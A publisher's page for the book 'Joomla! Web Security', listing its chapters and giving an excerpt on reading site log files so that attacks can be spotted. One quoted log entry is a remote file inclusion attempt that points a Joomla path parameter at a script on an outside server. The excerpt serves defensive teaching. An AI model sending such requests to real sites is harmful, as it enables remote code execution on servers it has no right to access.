Book Image

Joomla! Web Security

Book Image

Joomla! Web Security

Overview of this book

Related Content you might be interested in

Current Title:

Small book image
Joomla! Web Security
Oct, 2008 | 264 pages
No titles found
Table of Contents (16 chapters)
Joomla! Web Security
Joomla! Web Security
Credits
Credits
About the Author
About the Author
About the Reviewer
About the Reviewer
Preface
Preface
Free Chapter
1
Let's Get Started
Let's Get Started
Introduction
Common Terminology
Hosting—Selection and Unique Needs
Architecting for a Successful Site
Downloading Joomla!
.htaccess
Permissions
Common Trip Ups
Setting Up Security Metrics
Summary
2
Test and Development
Test and Development
Welcome to the Laboratory!
Reporting
Using the Ravenswood Joomla! Server
Summary
3
Tools
Tools
Introduction
Tools, Tools, and More Tools
Summary
4
Vulnerabilities
Vulnerabilities
Introduction
Importance of Patching is Paramount
What is a Vulnerability?
End Users
Summary
5
Anatomy of Attacks
Anatomy of Attacks
Introduction
SQL Injections
Remote File Includes
Summary
6
How the Bad Guys Do It
How the Bad Guys Do It
Laws on the Books
Acquiring Target
Sizing up the Target
Vulnerability Tools
Finding Targets to Attack
What Do I Do Then?
Countermeasures
Closing Words
Summary
7
php.ini and .htaccess
php.ini and .htaccess
.htaccess
php.ini
Summary
8
Log Files
Log Files
What are Log Files, Exactly?
Learning to Read the Log
Log File Analysis
Care and Feeding of Your Log Files
Tools to Review Your Log Files
Summary
9
SSL for Your Joomla! Site
SSL for Your Joomla! Site
What is SSL/TLS?
Process Steps for SSL
Performance Considerations
Other Resources
Summary
10
Incident Management
Incident Management
Creating an Incident Response Policy
Developing Procedures Based on Policy to Respond to Incidents
Summary
Security Handbook
Security Handbook
Security Handbook Reference
General Information
Tools
Ports
Logs
List of Critical Settings
General Apache Information
List of Ports
Summary

Learning to Read the Log

The logs should be reviewed daily for issues. These may be system issues, or attacks in progress, or you may see just for knowledge where your users are looking.

Here is an example. Let's see if you can find the issues:

[xx.xx.xx.52 - Internet Explorer - 4/23 13:06]
/index2.php?option=com_content&do_pdf=1&id=6
[xx.xx.xx.155 - Internet Explorer - 4/23 13:00]
//?mosConfig_absolute_path=http://www.cdpm3.com/test.txt???
[xx.xx.xx.202 - Firefox - 4/23 12:53]
/favicon.ico
[xx.xx.xx.82 - Internet Explorer - 4/23 12:45]
/index.php?option=com_docman&task=search_form&Itemid=27

This is not a common log format file from Apache, but a log file from a site. It records a lot of the same information. This particular log is generated from one of my favorite statistics package, BSQ Squared.

Reading my log file inside Joomla! using BSQ gives me a ton of information to indicate a lot; let's pick one entry. The log is as follows:

[xx.xx.xx.82 - Internet Explorer - 4/23...
Previous Section
End of Section 3
Next Section